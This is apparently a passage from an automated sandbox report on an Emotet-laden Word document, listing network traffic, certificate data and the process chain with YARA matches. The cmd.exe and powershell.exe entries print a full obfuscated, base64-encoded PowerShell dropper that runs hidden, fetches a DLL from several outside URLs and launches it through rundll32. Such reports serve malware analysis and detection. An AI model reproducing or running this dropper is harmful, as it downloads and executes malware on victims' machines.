                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                Host: 157.245.145.87:443
                                                                Content-Length: 5620
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Jan 26, 2021 10:49:36.791059017 CET755INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Tue, 26 Jan 2021 09:49:36 GMT
                                                                Content-Type: test/html; charset=UTF-8
                                                                Content-Length: 0
                                                                Connection: keep-alive
                                                                vary: Accept-Encoding


                                                                HTTPS Packets

                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                Jan 26, 2021 10:49:02.659636974 CET104.21.88.166443192.168.2.2249168CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Aug 01 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sun Aug 01 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                Jan 26, 2021 10:49:03.562979937 CET212.227.200.73443192.168.2.2249171CN=*.traumfrauen-ukraine.de CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 19 01:00:00 CET 2020 Mon Nov 27 13:46:10 CET 2017Tue May 18 14:00:00 CEST 2021 Sat Nov 27 13:46:10 CET 2027769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                CN=Encryption Everywhere DV TLS CA - G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USMon Nov 27 13:46:10 CET 2017Sat Nov 27 13:46:10 CET 2027
                                                                Jan 26, 2021 10:49:03.895838976 CET192.0.78.20443192.168.2.2249172CN=*.wpcomstaging.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Sep 29 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Oct 31 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: WINWORD.EXE PID: 2436 Parent PID: 584

                                                                General

                                                                Start time:10:48:35
                                                                Start date:26/01/2021
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                Imagebase:0x13f3a0000
                                                                File size:1424032 bytes
                                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: cmd.exe PID: 2608 Parent PID: 1220

                                                                General

                                                                Start time:10:48:37
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\System32\cmd.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
                                                                Imagebase:0x4a760000
                                                                File size:345088 bytes
                                                                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Analysis Process: msg.exe PID: 2572 Parent PID: 2608

                                                                General

                                                                Start time:10:48:37
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\System32\msg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:msg user /v Word experienced an error trying to open the file.
                                                                Imagebase:0xff6b0000
                                                                File size:26112 bytes
                                                                MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Analysis Process: powershell.exe PID: 2396 Parent PID: 2608

                                                                General

                                                                Start time:10:48:38
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AGUAbgB0AC8AYgBuADEASQBnACcAKwAnAEQAZQBqAGgALwAhACcAKwAnAG4AJwArACcAcwAgACcAKwAnAHcAdQAgACcAKwAnAGQAJwArACcAYgAnACkAKwAnACAAJwArACgAJwBuAGQAJwArACcAOgAnACkAKwAoACcALwAvAHQAcgBhAHUAbQBmAHIAYQB1AGUAJwArACcAbgAnACsAJwAtAHUAJwArACcAawByAGEAaQBuAGUAJwArACcALgBkACcAKwAnAGUALwAnACkAKwAnAGIAJwArACgAJwBpAG4ALwBKAHkAZQAnACsAJwBTAC8AIQBuAHMAIAAnACsAJwB3AHUAIAAnACsAJwBkACcAKQArACcAYgAnACsAKAAnACAAbgAnACsAJwBkACcAKQArACgAJwBzACcAKwAnADoALwAvAGoAZgBsACcAKwAnAG0AawB0AGcALgB3AHAAYwAnACsAJwBvACcAKwAnAG0AJwArACcAcwB0AGEAJwApACsAJwBnAGkAJwArACcAbgAnACsAJwBnACcAKwAoACcALgBjAG8AbQAnACsAJwAvAHcAcAAnACkAKwAoACcALQBjAG8AJwArACcAbgAnACkAKwAoACcAdABlAG4AJwArACcAdAAvACcAKQArACcAQQAnACsAJwBLACcAKwAnAC8AJwArACcAIQBuACcAKwAoACcAcwAnACsAJwAgAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgAG4AZABzADoALwAvAGwAaQAnACkAKwAoACcAbgBoAGsAaQAnACsAJwBlAG4AbQBhACcAKwAnAHkAdAAnACsAJwBpACcAKQArACgAJwBuAGgAJwArACcALgAnACkAKwAnAHQAJwArACcAYwAnACsAKAAnAHQAZQAnACsAJwBkAHUALgBjAG8AbQAnACsAJwAvACcAKQArACcAdwAnACsAKAAnAHAALQBzAG4AYQAnACsAJwBwAHMAJwArACcAaABvAHQAJwArACcAcwAvAFYAegBKAE0ALwAnACkAKQAuACIAcgBgAEUAcABMAGAAQQBDAEUAIgAoACgAJwBuACcAKwAnAHMAIAAnACsAKAAnAHcAdQAnACsAJwAgAGQAYgAgAG4AZAAnACkAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQARgBsADYAYgB3ADAAYwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBzAGAAUABMAEkAdAAiACgAJABIADYANABCACAAKwAgACQATwByAGIAXwBjAGgAMgAgACsAIAAkAFcAOAAyAEIAKQA7ACQASAA5ADEAUwA9ACgAJwBCACcAKwAoACcANQA5ACcAKwAnAFEAJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEQAdQAyAGoAbwAxAGoAIABpAG4AIAAkAEQAZQBsADcAdwBmAHkAKQB7AHQAcgB5AHsAKAAuACgAJwBOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAHMAeQBTAFQAZQBNAC4ATgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AdAApAC4AIgBEAE8AYAB3AG4ATABvAEEARABGAGAAaQBsAEUAIgAoACQARAB1ADIAagBvADEAagAsACAAJABRAGYAXwB6ADYANgB0ACkAOwAkAE8AMgAzAFAAPQAoACcAWgA2ACcAKwAnADgAWQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAUQBmAF8AegA2ADYAdAApAC4AIgBsAGAAZQBuAEcAdABoACIAIAAtAGcAZQAgADMAMQAwADYANQApACAAewAuACgAJwByACcAKwAnAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABRAGYAXwB6ADYANgB0ACwAKAAoACcAQQBuACcAKwAnAHkAJwApACsAKAAnAFMAdAAnACsAJwByAGkAJwApACsAJwBuAGcAJwApAC4AIgBUAE8AYABzAHQAYABSAEkATgBnACIAKAApADsAJABZADIAOABLAD0AKAAnAEUAJwArACgAJwAxACcAKwAnADQAVgAnACkAKQA7AGIAcgBlAGEAawA7ACQARAA4ADMAUQA9ACgAJwBUACcAKwAoACcAXwAnACsAJwAwAEgAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEMAOQAxAEYAPQAoACcASAAnACsAKAAnADgAOAAnACsAJwBWACcAKQApAA==
                                                                Imagebase:0x13f420000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                Analysis Process: rundll32.exe PID: 1204 Parent PID: 2396

                                                                General

                                                                Start time:10:48:44
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\System32\rundll32.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                                                Imagebase:0xff8c0000
                                                                File size:45568 bytes
                                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                Analysis Process: rundll32.exe PID: 2896 Parent PID: 1204

                                                                General

                                                                Start time:10:48:44
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
                                                                Imagebase:0xc00000
                                                                File size:44544 bytes
                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2099018804.0000000000890000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2098274054.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2098491144.0000000000230000.00000040.00020000.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                Analysis Process: rundll32.exe PID: 2952 Parent PID: 2896

                                                                General

                                                                Start time:10:48:45
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
                                                                Imagebase:0xc00000
                                                                File size:44544 bytes
                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2099681176.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2099699413.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2099787723.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                Analysis Process: rundll32.exe PID: 3028 Parent PID: 2952

                                                                General

                                                                Start time:10:48:46
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
                                                                Imagebase:0xc00000
                                                                File size:44544 bytes
                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103211054.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103277620.0000000000230000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103402652.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                Reputation:moderate

                                                                Analysis Process: rundll32.exe PID: 2484 Parent PID: 3028

                                                                General

                                                                Start time:10:48:47
                                                                Start date:26/01/2021
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
